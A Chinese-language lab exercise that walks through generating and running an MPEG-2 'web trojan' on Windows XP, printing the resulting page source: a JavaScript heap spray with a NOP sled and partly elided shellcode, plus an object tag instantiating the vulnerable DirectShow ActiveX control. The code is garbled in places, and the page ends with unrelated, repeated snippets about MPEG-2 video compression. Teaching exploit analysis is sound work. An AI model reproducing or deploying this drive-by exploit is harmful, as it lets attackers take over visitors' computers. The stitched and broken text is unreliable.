了解mpeg2網馬的工作原理。
能分析簡單的網馬。
用提供的工具生成mpeg2網馬。
閱讀生成的網馬的源**,熟悉其工作原理。
執行網馬,觀察生成的效果。
windows xp作業系統
mpeg-2 網馬生成工具
1、開啟控制台,進入虛擬環境。
2、用網馬生成器生成網馬
3、閱讀木馬檔案
首先我們看muma.html,雙擊muma.html,右鍵「檢視原始檔」,可看到其內容如下:
實際上nndx=「%u9090%u9090」
var dashell=unescape(nndx+"%u9090%....(省略中間的字元) %u2121%u2121%u2121%u2121%u2121%u2121%u2121%u0021" + "%u6363%u5251%u634c%u5553%u4550");
dashell裡面包含了shellcode
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.lengthomybro+=omybro;
bzmybr=omybro.substring(0,slackspace);
shuishimvp=omybro.substring(0,omybro.length-slackspace);
while(shuishimvp.length+slackspace<0x30000)
shuishimvp=shuishimvp+shuishimvp+bzmybr;
memory=new array();
for(x=0;x<300;x++)
memory[x]=shuishimvp+dashell;
以上的**就是做heapspray,簡單點說就是申請大量的堆空間,然後向裡面填入nop+shellcode,這樣當溢位發生的時候,eip會有很大的機率落入在這些堆中間,從而成功執行shellcode,主要用處就是用來增加溢位成功的機率。
var myobject=document.createelement('object');
myobject.width='1';
myobject.height='1';
myobject.data='./logo.gif';
myobject.classid='clsid:0955ac62-bf2e-4cba-a2b9-a63f772d46cf';
MPEG 2簡介及MPEG 2編譯碼 2
概括地說,mpeg 2影象壓縮的原理是利用了影象中的兩種特性 空間相關性和時間相關性。一幀影象內的任何乙個場景都是由若干畫素點構成的,因此乙個 畫素通常與它周圍的某些畫素在亮度和色度上存在一定的關係,這種關係叫作空間相關性 乙個節目中的乙個情節常常由若干幀連續影象組成的影象序列構成,乙個 影象序列中...
MPEG 2簡介及MPEG 2編譯碼 2
概括地說,mpeg 2影象壓縮的原理是利用了影象中的兩種特性 空間相關性和時間相關性。一幀影象內的任何乙個場景都是由若干畫素點構成的,因此乙個 畫素通常與它周圍的某些畫素在亮度和色度上存在一定的關係,這種關係叫作空間相關性 乙個節目中的乙個情節常常由若干幀連續影象組成的影象序列構成,乙個 影象序列中...
MPEG 2簡介及MPEG 2編譯碼 1
mpeg 2簡介及mpeg 2編譯碼 mpeg是活 像專家組 movingpictureexpertsgroup 的縮寫,於1988年成立。目前mpeg已頒布了三個活 像及聲音編 碼的正式國際標準,分別稱為mpeg 1 mpeg 2和mpeg 4,而mpeg 7和mpeg 21都在研究中。mpeg ...